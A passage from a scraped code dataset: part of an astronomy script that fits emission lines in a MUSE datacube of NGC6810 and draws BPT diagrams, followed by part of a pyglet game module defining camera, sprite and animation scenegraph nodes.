np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4)) + pars['C_g4']\n if p == 5:\n argu1 = (x - pars['cen_g1'])**2 / (2*(pars['wid_g1'])**2)\n argu2 = (x - pars['cen_g2'])**2 / (2*(pars['wid_g2'])**2)\n argu3 = (x - pars['cen_g3'])**2 / (2*(pars['wid_g3'])**2)\n argu4 = (x - pars['cen_g4'])**2 / (2*(pars['wid_g4'])**2)\n argu5 = (x - pars['cen_g5'])**2 / (2*(pars['wid_g5'])**2)\n model = (pars['amp_g1'] * np.exp(-argu1) + pars['amp_g2']*np.exp(-argu2) + pars['amp_g3']*np.exp(-argu3) + pars['amp_g4']*np.exp(-argu4) + pars['amp_g5']*np.exp(-argu5)) + pars['C_g5']\n \n if data is None:\n return model, model1, model1z, model2z\n if sigma is None:\n return model - data\n return (model - data) / sigma \n\n#----------------------------------------------------------------------------\n\n##FUNCTIONS TO MAKE THE SPIRAL GRID FOR FITTING\ndef invers_spiral(A):\n return A[::-1] # inverting the array, so it starts from the center \n\ndef spiral_mat_to_vect(A):\n v = []\n while(A.size != 0):\n v.append(A[0,:])\n A = A[1:,:].T[::-1]\n return np.concatenate(v)\n\ndef spiral_vect_to_mat(v):\n L = int(np.sqrt(v.size)) # lenght of the piece to add\n l = L\n A = np.zeros((L,L))\n i = 3 # starting from 3, so in this way the x coordinate will increase on the second step \n x = 0 # x coordinate of the new piece\n y = 0 # y coordinate of the new piece\n \n A[x,y:l] = v[0:l]\n A = A.T[::-1]\n v = v[l:len(v)]\n\n while(v.size != 0):\n i += 1 # In every step: rotate and fill the first raw of the matrix\n if i % 2 == 0: # Every 2 rotations l decreases\n l -= 1\n if (i + 1) % 4 == 0: # Every 4 rotations x increases\n x += 1\n if i % 4 == 0: # Every 4 rotations y increases with a delay of 1 step compared to x\n y += 1\n A[x,y:y+l] = v[0:l]\n A = A.T[::-1]\n v = v[l:len(v)]\n \n for rotations in range(i % 4): # The last rotations to have the matrix rotated in the correct way\n A = A.T[::-1]\n \n return A\n\n#---------------------------------------------------------------------------- \n\npath = os.path.dirname(os.path.abspath('__file__'))\n\n# Open and managing the datacubes\nfilefits_data = 'NGC6810_Data.fits'\ndatacube = fits.open(path+'/file/Muse/'+filefits_data)[0]\nNz,Ny,Nx = datacube.shape\nprint (Nz, Ny, Nx)\n\n\n# define the z-axis which corresponds to frequency\nnaxis3 = datacube.header['NAXIS3']\ncrpix3 = datacube.header['CRPIX3'] # reference pixel\ncrval3 = datacube.header['CRVAL3'] # angstrom (Starting wavelenght)\ncdelt3 = datacube.header['CD3_3'] # wavelenght increment\n\nkk = 1+np.arange(naxis3)\n \nwavelenght = crval3+cdelt3*(kk-crpix3) #A\nwavelenght_m = (wavelenght / 1e10 ) * u.m\n\nwavelenght_beta = wavelenght_m[8:98]\nwavelenght_O = wavelenght_m[110:210]\nwavelenght_alpha = wavelenght_m[1400:1500]\n\nfrequency = K.c.to('m s-1') / wavelenght_m #Hz\nfrequency = 1 * frequency.to('THz')\n\nfrequency_beta = frequency[8:98]\nfrequency_O = frequency[110:210]\nfrequency_alpha = frequency[1400:1500]\n\n\n\n\n# define the z-axis in velocity units \n# average frequency\nfrequency_mean = np.mean(frequency)\nprint(frequency_mean)\n\n\n# z = v/c = (nu_emit - nu_obs)/nu_obs \nvelocity_unit = ((frequency_mean- (frequency))/(frequency))*K.c.to('km/s')\nvelocity_beta = (((612.604172*u.THz - (frequency_beta))/(frequency_beta))*K.c.to('km/s')).value\nvelocity_O = (((594.850769*u.THz - (frequency_O))/(frequency_O))*K.c.to('km/s')).value\nvelocity_alpha = ((( 453.778836*u.THz - (frequency_alpha))/(frequency_alpha))*K.c.to('km/s')).value\nprint(velocity_unit[:10])\nvelocity = velocity_unit.value\nprint(velocity[:10])\ndv = np.abs(velocity[1]-velocity[0])\ndlambda = np.abs(wavelenght[1]-wavelenght[0])\n\n#----------------------------------------------------------------------------\n\n# TOTAL SPECTRUM\n# location of the target\nx0,y0 = 155, 150\n# size of the square aperture \ndl = 80\n# extract the spectrum\nspectrum = np.nansum(datacube.data[:,y0-dl:y0+dl,x0-dl:x0+dl],axis = (1,2))\n\n# 0plot: Wavelenght - Spectrum\nplt.figure(figsize = (12,4))\nplt.plot(wavelenght, spectrum, label = 'data')\nplt.plot(wavelenght,wavelenght*0,':',color = 'black')\nplt.xlabel('wavelenght [A°]')\nplt.ylabel('flux ')\nplt.title('Total Spectrum')\nplt.legend()\nplt.show()\n\n# 1plot: frequency - spectrum\nplt.figure(figsize = (12,4))\nplt.plot(frequency, spectrum, label = 'data')\nplt.plot(frequency,frequency*0,':',color = 'black')\nplt.xlabel('frequency [THz]')\nplt.ylabel('flux ')\nplt.title('Total Spectrum')\nplt.legend()\nplt.show()\n\n\n\n# # 2plot: velocity - spectrum\n# plt.figure(figsize = (12,4))\n# plt.plot(velocity, spectrum, label = 'data')\n# plt.plot(velocity,frequency*0,':',color = 'black')\n# plt.xlabel('velocity [km/s]')\n# plt.ylabel('flux ')\n# plt.title('Totale Spectrum (function of velocity)')\n# plt.legend()\n# plt.show()\n\n#----------------------------------------------------------------------------\n\n## RMS DETERMINATION WITH THE POWER RESPONSE \n\n# Choosing an empty region\nx0, y0 = 280, 30\ndl = 15\nnoise = datacube.data[:,y0-dl:y0+dl,x0-dl:x0+dl]\nerror_beta = np.std(noise[8:98,:,:])\nerror_O = np.std(noise[ 110:210,:,:])\nerror_alpha = np.std(noise[1400:1500, :, :])\nerror_tot = np.std(noise[:, :, :])\n\nprint(\"rms = {:2f} mJy\".format(error_alpha))\nprint(\"####################\")\n\n#----------------------------------------------------------------------------\n\n# Fit and plot of the total spectrum\n# First Line: H_beta 4862\n# Doublet O_III 4960 - 5008\n# Doublet N_II 6549-6585 + H_alpha 6564\nx = wavelenght\ndata = spectrum\np = 3\n\nfit_params = Parameters()\nfit_params.add('amp_g1', value=2e6,)\nfit_params.add('cen_g1', value=4862.68)\nfit_params.add('wid_g1', value=100)\nfit_params.add('C_g1', value=1e5,)\nfit_params.add('amp_g2', value=1e6,)\nfit_params.add('cen_g2', value=5000)\nfit_params.add('wid_g2', value=200)\nfit_params.add('C_g2', value=1e5,)\nfit_params.add('amp_g3', value=8e6,)\nfit_params.add('cen_g3', value=6560)\nfit_params.add('wid_g3', value=200)\nfit_params.add('C_g3', value=1e5,)\n\n\nout = minimize(residual, fit_params, args=(x,p,), kws={'data': data})\nfit, fit1, fit1z, fit2z = residual(out.params, x, p)\nprint('##')\nprint('Total_Spectrum_fit')\nreport_fit(out)\nparvals = out.params.valuesdict()\nstddev_t = parvals['wid_g1']\nprint(\"FWHM = {:2f} km/s\".format(2.355*stddev_t))\n\n\nbic_1g = out.bic #Bayesian Crit Info for the fit with 1 Gaussian\n\nplt.figure(figsize = (12,4))\nplt.plot(x, data, label='data')\nplt.plot(x, data*0,':',color = 'black')\nplt.plot(x, fit, label='best fit')\nplt.xlabel('Wavelenght [A°]')\nplt.ylabel('flux [Jy]')\nplt.title('Total Spectrum fit with 3 gaussians')\nplt.legend()\nplt.show()\n\ndel(x, fit, fit1, fit1z, fit2z)\n#----------------------------------------------------------------------------\n\n# Making 3 different subcubes for the 3 part of the fit (H_beta, O_III doublet, H_alpha e NII doublet)\n\n#H_beta\n\nO_III = datacube.data[8:98, :, :]\nw_beta = wavelenght[8:98]\nO_III = datacube.data[110:210, :, :]\nw_O = wavelenght[110:210]\nH_alpha = datacube.data[1400:1500, :, :]\nw_alpha = wavelenght[1400:1500]\n\n\n#----------------------------------------------------------------------------\n\nmod = fits.open(path + '/1mod.fits')[0].data\nmod_alpha_t = fits.open(path + '/2modalpha.fits')[0].data\nflux_H_alpha = fits.open(path + '/flux_map_H_definitive.fits')[0].data\nvel_map = fits.open(path + '/4vel_H.fits')[0].data\nvdisp_map =fits.open(path + '/5disp_H.fits')[0].data\namperr =fits.open(path + '/6amperr_H.fits')[0].data\nvelerr = fits.open(path + '/7velerr_H.fits')[0].data\ndisperr = fits.open(path + '/8disperr_H.fits')[0].data \nflux_NII = fits.open(path + '/9flux_map_N.fits')[0].data\nflux_OIII = fits.open(path + '/moments_map/NGC6810_MUSE/O_III/flux_map_O_5008_spiral_3_1gxNGC6810_MUSE_OIII.fits')[0].data\nflux_H_beta = fits.open(path + '/moments_map/NGC6810_MUSE/H_beta/flux_map_spiral_4_1gxNGC6810_MUSE_H_beta_clean.fits')[0].data\n\nflux_H_alpha *= 1e-20\nflux_H_beta *= 1e-20\nflux_NII *= 1e-20\nflux_OIII *= 1e-20\n# Plot \nplt.figure(figsize = (14,9))\n\nplt.subplot(221)\nplt.imshow(flux_H_alpha, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7, label = 'Flux [Jy]')\nplt.title('H_alpha')\nplt.subplot(222)\nplt.imshow(flux_NII, origin = 'lower', cmap ='jet')\nplt.colorbar(shrink = 0.7, label='Flux [Jy]')\nplt.title('N_II')\nplt.subplot(223)\nplt.imshow(flux_OIII, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7, label = 'Flux [Jy]')\nplt.title('O_III')\nplt.subplot(224)\nplt.imshow(flux_H_beta, origin = 'lower', cmap = 'jet')\nplt.colorbar(shrink = 0.7, label = 'Flux [Jy]')\nplt.title('H_beta')\nplt.suptitle('Flux Maps')\nplt.show()\n\n\nmask1 = ~np.isnan(flux_H_alpha) \nmask2 = ~np.isnan(flux_NII)\nmask3 = ~np.isnan(flux_OIII)\nmask4 = ~np.isnan(flux_H_beta)\nmask = mask1 * mask2 * mask3 * mask4\nmap_x = np.full_like(flux_H_alpha, np.nan)\nmap_y = np.full_like(flux_H_alpha, np.nan)\nmap_x = np.log10(flux_NII/flux_H_alpha)\nmap_y = np.log10(flux_OIII /flux_H_beta)\nx = np.log10(flux_H_alpha[mask] /flux_NII[mask])\ny = np.log10(flux_OIII[mask] /flux_H_beta[mask])\nlog_nii_ha = np.log10(flux_NII)\nlog_OIII = np.log10(flux_OIII)\nlog_hb = np.log10(flux_H_beta)\nlog_ha = np.log10(flux_H_alpha)\n\n\n\n\n\n\n\n# Below are listed the demarcations summarized by Kewley et al 2006 for each diagram:\n# 1) BPT-NII:\n# log([OIII]/Hb) = 0.61 / (log([NII]/Ha) - 0.05) + 1.3 (Kauffmann+03 line)\n# log([OIII]/Hb) = 0.61 / (log([NII]/Ha) - 0.47) + 1.19 (Kewley+01 line)\n# 2) BPT-SII:\n# log([OIII]/Hb) = 0.72 / (log([SII]/Ha) - 0.32) + 1.30 (main AGN line)\n# log([OIII]/Hb) = 1.89 log([SII]/Ha) + 0.76 (LINER/Sy2 line)\n# 3) BPT-OI:\n# log([OIII]/Hb) = 0.73 / (log([OI]/Ha) + 0.59) + 1.33 (main AGN line)\n# log([OIII]/Hb) = 1.18 log([OI]/Ha) + 1.30 (LINER/Sy2 line)\n\nlog_nii_ha = np.log10(flux_NII)\nlog_OIII = np.log10(flux_OIII)\nlog_hb = np.log10(flux_H_beta)\nlog_ha = np.log10(flux_H_alpha)\n\ndef bpt_nii(log_nii_ha, relation = 'both'):\n log_nii_ha_k03 = np.copy(log_nii_ha)\n log_nii_ha_k03[log_nii_ha_k03>= 0.05] = 0.04\n log_nii_ha_k01 = np.copy(log_nii_ha)\n log_nii_ha_k01[log_nii_ha_k01>= 0.47] = 0.46\n kauffmann03 = 0.61 / (log_nii_ha_k03 - 0.05) + 1.3\n kewley01 = 0.61 / (log_nii_ha_k01 - 0.47) + 1.19\n #kauffman < kewley\n log_oiii_ha = np.asarray([kauffmann03,kewley01])\n return log_oiii_ha\ndef pbt(x_ratio, y_ratio, diagram = 'nii', quiet = True):\n '''\n Parameters\n ----------\n x_ratio : array\n log10([OIII]/Hb)\n y_ratio : array\n log10([NII]/Ha) o\n diagram : strinf, optional\n select the PBT diagram to use for the selection.\n The default is 'nii’.\n quiet : TYPE, optional\n DESCRIPTION. The default is True.\n Returns\n -------\n bpt_type : array\n return the BPT classification\n 1: SF\n 2: mixed\n 3: AGN\n '''\n if diagram == 'nii':\n y1_ratio, y2_ratio = bpt_nii(x_ratio, relation = 'both')\n sel_kauffmann03 = y_ratio>y1_ratio\n sel_kewley01 = y_ratio>y2_ratio\n bpt_type = sel_kauffmann03.astype(int)+sel_kewley01.astype(int)\n return bpt_type\ndef PBTdiagrams(oiiihb,niiha, siiha,oiha, color = 'blue',\n ax= None):\n# ax.subplot(131)\n# p1 = plt.scatter(niihaN,oiiihbN, color = 'orange’, label = 'narrow’)\n ax[0].scatter(niiha, oiiihb ,c = color)#,color = 'blue’, label = 'broad’)\n x = np.linspace(-2,1,100)\n y1 = 0.61/(x-0.47)+1.19\n y1[x>=0.47]=-12\n y2 = 0.61/(x-0.05)+1.3\n y2[x>=0.05]=-12\n ax[0].plot(x,y1, color='black')\n ax[0].plot(x,y2, color='black', linestyle='--')\n ax[0].set_xlabel(r'Log([NII]6584/H$\\alpha$)')\n ax[0].set_ylabel(r'Log([OIII]5007/H$\\beta$)')\n ax[0].set_xlim(-1.5,0.8)\n ax[0].set_ylim(-0.4,1.2)\n# ax.subplot(132)\n ax[1].scatter(siiha, oiiihb, c = color)#,color = 'blue’)\n ax[1].set_xlim(-1.5,0.6)\n ax[1].set_ylim(-0.4,1.2)\n x = np.linspace(-2,1,100)\n y1 = 0.72/(x-0.32)+1.30\n y1[x>=0.32]=-12\n y2 = 1.89*x+0.76\n y2[y2<=y1]=y1[y2<=y1]\n ax[1].set_xlabel(r'Log([SII]6717+6731/H$\\alpha$)')\n ax[1].set_ylabel(r'Log([OIII]5007/H$\\beta$)')\n ax[1].plot(x,y1, color='black')\n ax[1].plot(x,y2, color='black', linestyle='--')\n# ax.subplot(133)\n# plt.scatter(oihaN,oiiihbN, color = 'orange')\n ax[2].scatter(oiha, oiiihb, c = color)#,color = 'blue') #mettere una lista di 1 al post do oiha\n x = np.linspace(-3,1,100)\n y1 = 0.73/(x+0.59)+1.33\n y1[x>=-0.59]=-12\n y2 = 1.18*x+1.30\n y2[y2<=y1]=y1[y2<=y1]\n ax[2].set_xlabel(r'Log([OI]6300/H$\\alpha$)')\n ax[2].set_ylabel(r'Log([OIII]5007/H$\\beta$)')\n ax[2].plot(x,y1, color='black')\n ax[2].plot(x,y2, color='black', linestyle='--')\n ax[2].set_xlim(-2.5,-0.0)\n ax[2].set_ylim(-0.4,1.2)\n\n# log_nii_ha = np.arange(-2,1,0.1)\n# y1,y2 = bpt_nii(log_nii_ha, relation = 'both')\n# log_nii_ha_obs = np.asarray([0.5,-0.4,-1])\n# log_oiii_hb_obs = np.asarray([1,0.4,0.4])\n# print(pbt(log_nii_ha_obs,log_oiii_hb_obs))\n# plt.plot(log_nii_ha,y1)\n# plt.plot(log_nii_ha,y2)\n# plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\n# plt.ylim(-0.5,1.2)\n\n\n\n\nlog_nii_ha = np.arange(-2,1,0.1)\ny1,y2 = bpt_nii(log_nii_ha, relation = 'both')\nlog_nii_ha_obs = np.asarray([0.5,-0.4,-1])\nlog_oiii_hb_obs = np.asarray([1,0.4,0.4])\nprint(pbt(log_nii_ha_obs,log_oiii_hb_obs))\nplt.plot(log_nii_ha,y1)\nplt.plot(log_nii_ha,y2)\nplt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\nplt.ylim(-0.5,1.2)\n\n\n\nmask1 = ~np.isnan(flux_H_alpha) \nmask2 = ~np.isnan(flux_NII)\nmask3 = ~np.isnan(flux_OIII)\nmask4 = ~np.isnan(flux_H_beta)\nmask = mask1 * mask2 * mask3 * mask4\nx = np.log10(flux_NII[mask]/flux_H_alpha[mask] )\ny = np.log10(flux_OIII[mask] /flux_H_beta[mask])\n\n# log_nii_ha = np.log10(flux_NII)\nlog_OIII = np.log10(flux_OIII)\nlog_hb = np.log10(flux_H_beta)\nlog_ha = np.log10(flux_H_alpha)\nbpttypes = pbt(x, y)\nsfmask = np.zeros_like(bpttypes)\nsfmask[bpttypes == 0] = True\nmixedmask = np.zeros_like(bpttypes)\nmixedmask [bpttypes == 1 ] = True\nagnmask = np.zeros_like(bpttypes)\nagnmask [bpttypes == 2 ] = True\n\n\nplt.figure(figsize = (14,10))\nplt.scatter(x, y, label='data', marker = '.')\nplt.xlabel('$log_{10}$([$N_{II}$]/[$H_{alpha}$])')\nplt.ylabel('$log_{10}$([$O_{III}$]/[$H_{beta}$])')\nplt.title('BPT Diagram')\nplt.plot(log_nii_ha,y1, 'o-', color='red')\nplt.plot(log_nii_ha,y2,'o-', color='orange')\n# plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\nplt.ylim(-2,2)\nplt.xlim(-2, 1)\nplt.legend()\nplt.show()\n\n# plt.figure(figsize = (14,10))\n# plt.scatter(x[sfmask], y[sfmask], label='SF', marker = '.', color= 'blue')\n# plt.scatter(x[mixedmask], y[mixedmask], label='Mixed', marker = '.', color='green')\n# plt.scatter(x[agnmask], y[agnmask], label='AGN', marker = '.', color='red')\n# plt.xlabel('log10([H_alpha]/[N_II])')\n# plt.ylabel('log10([O_III]/[H_beta])')\n# plt.title('BPT Diagram')\n# plt.plot(log_nii_ha,y1, 'o-', color='red')\n# plt.plot(log_nii_ha,y2,'o-', color='orange')\n# # plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\n# plt.ylim(-2,2)\n# plt.xlim(-2, 1)\n# plt.legend()\n# plt.show()\n\n\n#prepare for masking arrays - 'conventional' arrays won't do it\ny_values = np.ma.array(y)\n#mask values below a certain threshold\ny_sf = np.ma.masked_where(bpttypes < 0 , y_values)\ny_mixed = np.ma.masked_where(bpttypes < 1 , y_values)\ny_agn = np.ma.masked_where(bpttypes < 2 , y_values)\n\nplt.figure(figsize = (14,10))\nplt.scatter(x, y_sf, label='SF', marker = '.', color= 'blue')\nplt.scatter(x, y_mixed, label='Mixed', marker = '.', color='green')\nplt.scatter(x, y_agn, label='AGN', marker = '.', color='red')\nplt.xlabel('$log_{10}$([$N_{II}$]/[$H_{alpha}$])')\nplt.ylabel('$log_{10}$([$O_{III}$]/[$H_{beta}$])')\nplt.title('BPT Diagram')\nplt.plot(log_nii_ha,y1, 'o-', color='orange', label = 'kauffmann03')\nplt.plot(log_nii_ha,y2,'s-', color='black', label = 'kewley01')\n# plt.scatter(log_nii_ha_obs,log_oiii_hb_obs)\nplt.ylim(-2,2)\nplt.xlim(-2, 1)\nplt.legend()\nplt.show()\n\n\n#Remapping the bpt diagram on the galaxy\n\nmask_map = np.ma.array(map_y)\nlog_nii_ha_k03 = np.copy(map_x)\nlog_nii_ha_k03[log_nii_ha_k03>= 0.05] = 0.04\nlog_nii_ha_k01 = np.copy(map_x)\nlog_nii_ha_k01[log_nii_ha_k01>= 0.47] = 0.46\nkauffmann03 = y1_ratio = 0.61 / (log_nii_ha_k03 - 0.05) + 1.3\nkewley01 = y2_ratio = 0.61 / (log_nii_ha_k01 - 0.47) + 1.19\ncond1 = map_y < y1_ratio\ncond2 = (map_y > y1_ratio) * (map_y < y2_ratio)\ncond3 = map_y > y2_ratio\nmap_sf = np.ma.masked_where(cond1 , mask_map)\nmap_mixed = np.ma.masked_where(cond2, mask_map)\nmap_agn = np.ma.masked_where(cond3, mask_map)\n\n# map_sf = np.ma.masked_where((map_y < y1_ratio).any , mask_map)\n# map_mixed = np.ma.masked_where((map_y > y1_ratio).any and (map_y < y2_ratio).any, mask_map)\n# map_agn = np.ma.masked_where((map_y > y2_ratio).any, mask_map)\n\nmap_sf = 1.0 * np.ones_like(map_y)\nmap_sf[cond1 == False] = np.nan\nmap_mixed = 1.0 * np.ones_like(map_y)\nmap_mixed[cond2 == False] = np.nan\nmap_agn = 1.0 * np.ones_like(map_y)\nmap_agn[np.where(cond3 == False)] = np.nan\n\n#Plot\n\nplt.figure(figsize = (14,9))\n\ntest = 1* cond3\nplt.imshow(flux_H_alpha, origin='lower', cmap = 'gray', alpha = 0.1)\nplt.imshow(map_sf, origin = 'lower', cmap = 'Blues',interpolation = 'none')\nplt.colorbar(shrink = 0.7, label = 'SF')\nplt.imshow(map_mixed, origin = 'lower', cmap ='Greens',interpolation = 'none')\nplt.colorbar(shrink = 0.7, label='Mixed')\nplt.imshow(map_agn, origin = 'lower', cmap = 'Reds', interpolation = 'none')\nplt.colorbar(shrink = 0.7, label = 'AGN')\nplt.title('BPT Diagram projected on the Galaxy')\nplt.show()\n\n\n# --------------------------------------------------\n# # Saving the data\n \n# hdu = fits.PrimaryHDU(mod)\n# hdul = fits.HDUList([hdu])\n# hdul.writeto('1mod.fits', overwrite = True)\n# #----------------------------------------------------------------------------\n\n","repo_name":"taurosss/Galaxy_outflow_final","sub_path":"bpt_diagram.py","file_name":"bpt_diagram.py","file_ext":"py","file_size_in_byte":19929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16153426952","text":"import os\nimport json\nimport math\n\nimport pyglet\nfrom pyglet import gl\nimport pyglet.image.atlas\n\nfrom itertools import chain\n\nfrom ..geom import Rect, v\n\nfrom pkg_resources import resource_filename, resource_stream\n\n\ndef _texture_atlas_add(self, img):\n \"\"\"Monkey patch pyglet to pad the texture atlas to remove adjacency artifacts.\n\n Taken from http://markmail.org/message/qn65kjlieq6n333k\n \"\"\"\n pad = 1\n x, y = self.allocator.alloc(img.width + pad * 2, img.height + pad * 2)\n self.texture.blit_into(img, x + pad, y + pad, 0)\n region = self.texture.get_region(x + pad, y + pad, img.width, img.height)\n return region\n\npyglet.image.atlas.TextureAtlas.add = _texture_atlas_add\n\n\npyglet.resource.path += [\n resource_filename('wildwest', 'assets/sprites/'),\n resource_filename('wildwest', 'assets/textures/'),\n]\npyglet.resource.reindex()\n\n\nclass Camera(object):\n \"\"\"A camera object.\"\"\"\n def __init__(self, offset, screen_w, screen_h):\n self.near = 1.0\n self.focus = 800.0 # the plane our 2D scene is mainly on\n self.far = 10000.0\n self.screen_w = screen_w\n self.screen_h = screen_h\n self.offset = v(offset)\n\n def get_plane_rect(self, depth):\n \"\"\"Get the rectangle of a plane perpendicular to the view direction,\n a distance depth from the camera.\"\"\"\n scale = depth / self.focus\n x, y = self.offset\n\n # The extra 1/1.01 is to cover the distance from the centre of the\n # outside pixels to the edge of the frustum\n sw = self.screen_w + 1.001\n sh = self.screen_h + 1.001\n\n return Rect(\n x + scale * -0.5 * sw,\n x + scale * 0.5 * sw,\n y + scale * -0.5 * sh,\n y + scale * 0.5 * sh\n )\n\n def get_left_plane(self, depth):\n scale = depth / self.focus\n x = self.offset.x\n\n # The extra 1/1.01 is to cover the distance from the centre of the\n # outside pixels to the edge of the frustum\n sw = self.screen_w + 1.001\n return x + scale * -0.5 * sw\n\n def far_plane(self):\n \"\"\"Get the rectangle of the back plane\"\"\"\n return self.get_plane_rect(self.far)\n\n def near_plane(self):\n \"\"\"Get the rectangle of the near plane\"\"\"\n return self.get_plane_rect(self.near)\n\n def viewport(self):\n \"\"\"Get the rectangle of the near plane\"\"\"\n x, y = self.offset\n return Rect(\n x + -0.5 * self.screen_w,\n x + 0.5 * self.screen_w,\n y + -0.5 * self.screen_h,\n y + 0.5 * self.screen_h,\n )\n\n def setup_matrixes(self):\n x, y = self.offset\n gl.glMatrixMode(gl.GL_PROJECTION)\n gl.glLoadIdentity()\n# fov = math.atan(self.screen_h * 0.5 / self.focus)\n# aspect = self.screen_w * 1.0 / self.screen_h\n# gl.gluPerspective(fov, aspect, self.near, self.far)\n l = -0.5 * self.screen_w / (self.focus - self.near)\n r = -l\n b = -0.5 * self.screen_h / (self.focus - self.near)\n t = -b\n self.np = Rect(l, r, b, t)\n gl.glFrustum(l, r, b, t, self.near, self.far)\n gl.glMatrixMode(gl.GL_MODELVIEW)\n gl.glLoadIdentity()\n gl.glTranslatef(-x, -y, -self.focus)\n\n\nclass Node(object):\n \"\"\"Base class for scenegraph objects.\"\"\"\n z = 0\n scenegraph = None\n\n def set_scenegraph(self, scenegraph):\n self.scenegraph = scenegraph\n\n\nclass CompoundNode(Node):\n def __init__(self, pos=(0, 0), children=()):\n self.pos = v(pos)\n self.children = []\n for c in children:\n self.add_child(c)\n self.build()\n\n def set_scenegraph(self, scenegraph):\n self.scenegraph = scenegraph\n for c in self.children:\n c.set_scenegraph(scenegraph)\n\n def build(self):\n \"\"\"Subclasses can override this to populate the node.\"\"\"\n\n def add_child(self, c):\n assert isinstance(c, Node), '%r is not a Node' % c\n c.set_scenegraph(self.scenegraph)\n self.children.append(c)\n\n def remove_child(self, c):\n c.set_scenegraph(None)\n self.children.remove(c)\n\n def draw(self, camera):\n self.children.sort(key=lambda x: x.z)\n gl.glPushMatrix()\n gl.glTranslatef(self.pos.x, self.pos.y, 0)\n for c in self.children:\n c.draw(camera)\n gl.glPopMatrix()\n\n\nclass SpriteNode(Node):\n def __init__(self, pos, animation, z=0):\n self.z = z\n self.sprite = pyglet.sprite.Sprite(animation)\n self.pos = v(pos)\n\n def get_position(self):\n return self._pos\n\n def set_position(self, pos):\n self._pos = pos\n self.sprite.position = pos\n\n pos = property(get_position, set_position)\n\n def draw(self, camera):\n self.sprite.draw()\n\n\nclass StaticImage(SpriteNode):\n def __init__(self, pos, img, z=-1):\n im = pyglet.resource.image(img)\n super(StaticImage, self).__init__(pos, im, z)\n\n\nclass FloatyImage(StaticImage):\n \"\"\"An image that bounces up and down in space, in typical power-up fashion.\"\"\"\n def draw(self, camera):\n gl.glPushMatrix()\n gl.glTranslatef(0, 6 * math.sin(5 * self.scenegraph.t), 0)\n super(FloatyImage, self).draw(camera)\n gl.glPopMatrix()\n\n\nclass FadeyImage(StaticImage):\n \"\"\"An image that fades out over time.\"\"\"\n opacity = 0\n t = None\n\n def show(self):\n self.opacity = 1\n self.t = None\n\n def draw(self, camera):\n if self.t is None:\n self.t = self.scenegraph.t\n else:\n self.opacity = max(0, self.opacity - (self.scenegraph.t - self.t) * 0.5)\n if self.opacity == 0:\n self.scenegraph.remove(self)\n return\n self.t = self.scenegraph.t\n self.sprite.opacity = int(self.opacity * 255)\n super(FadeyImage, self).draw(camera)\n\n\n\nclass Animation(SpriteNode):\n \"\"\"Node that loads multiple animations from a JSON file.\n\n The current animation can be changed using .play()\n \"\"\"\n loaded = {}\n\n def __init__(self, fname, pos, z=0):\n self.flip_x = False\n self.default, self.animations = self.load(os.path.join('assets', 'animations', fname))\n self.playing = self.default\n super(Animation, self).__init__(pos, self.get_animation('default'), z=z)\n self.sprite.set_handler('on_animation_end', self.on_animation_end)\n\n def set_scenegraph(self, sg):\n if sg is None:\n self.sprite.pop_handlers()\n self.sprite.remove_handler('on_animation_end', self.on_animation_end)\n super(Animation, self).set_scenegraph(sg)\n\n def on_animation_end(self, *args):\n if self.sprite.image.frames[-1].duration == 0:\n self.play('default')\n\n def set_flip(self, flip):\n if flip == self.flip_x:\n return\n self.play(self.playing, flip)\n\n def load(self, fname):\n try:\n return self.loaded[fname]\n except KeyError:\n pass\n\n from pyglet.image import Animation, AnimationFrame\n\n self.doc = json.load(resource_stream('wildwest', fname))\n\n animations = {}\n default = None\n for name, a in list(self.doc.items()):\n if name == 'default':\n if isinstance(a, str):\n default = a\n continue\n else:\n default = 'default'\n frames = []\n for f in a['frames']:\n im = pyglet.resource.image(f['file'])\n im.anchor_x, im.anchor_y = a.get('anchor', (0, 0))\n frames.append(\n [im, a.get('frametime', 0.1)]\n )\n\n if not a.get('loop', False):\n if len(frames) == 1:\n frames.append(frames[0])\n frames[-1][1] = 0\n\n animations[name] = Animation([AnimationFrame(*f) for f in frames])\n self.loaded[fname] = default, animations\n return default, animations\n\n def get_animation(self, name):\n if name == 'default':\n return self.animations[self.default]\n return self.animations[name]\n\n def play(self, name, flip=None):\n if name == 'default':\n name = self.default\n\n if name == self.playing and (flip is None or flip == self.flip_x):\n return\n if flip is not None:\n self.flip_x = flip\n anim = self.get_animation(name)\n if self.flip_x:\n anim = anim.get_transform(flip_x=True)\n self.playing = name\n self.sprite.image = anim\n\n\nclass AnimatedEffect(Animation):\n def on_animation_end(self, *args):\n self.scenegraph.remove(self)\n\n\nclass Depth(Node):\n def __init__(self, node, dz, pos=v(0, 0)):\n self.node = node\n self.dz = dz\n self.pos = v(pos)\n\n def get_position(self):\n return self._pos\n\n def set_position(self, pos):\n self._pos = pos\n self.node.pos = pos\n\n pos = property(get_position, set_position)\n\n @property\n def z(self):\n return self.node.z + self.dz\n\n def draw(self, camera):\n gl.glPushMatrix()\n gl.glTranslatef(self.pos.x, self.pos.y, self.dz)\n self.node.draw(camera)\n gl.glPopMatrix()\n\n\nclass GroundPlane(Node):\n z = -9999\n\n def __init__(self, near_colour, far_colour, y=0):\n self.near_colour = list(near_colour)\n self.far_colour = list(far_colour)\n self.y = y\n\n def draw(self, camera):\n far = camera.far_plane()\n near = camera.near_plane()\n focus = camera.focus\n coords = ('v3f', [\n near.l, self.y, focus - camera.near,\n near.r, self.y, focus - camera.near,\n far.r, self.y, focus - camera.far,\n far.l, self.y, focus - camera.far,\n ])\n col = ('c4B', self.near_colour * 2 + self.far_colour * 2)\n pyglet.graphics.draw(4, gl.GL_QUADS, coords, col)\n\n\nclass SkyBox(Node):\n z = -10000\n\n def __init__(self, horizon_colour, zenith_colour):\n self.horizon_colour = list(horizon_colour)\n self.zenith_colour = list(zenith_colour)\n\n def draw(self, camera):\n far = camera.far_plane()\n z = -camera.far + camera.focus\n coords = ('v3f', [\n far.l, 0, z,\n far.r, 0, z,\n far.r, far.t, z,\n far.l, far.t, z,\n ])\n col = ('c4B', self.horizon_colour * 2 + self.zenith_colour * 2)\n pyglet.graphics.draw(4, gl.GL_QUADS, coords, col)\n\n\nclass RectNode(Node):\n def __init__(self, 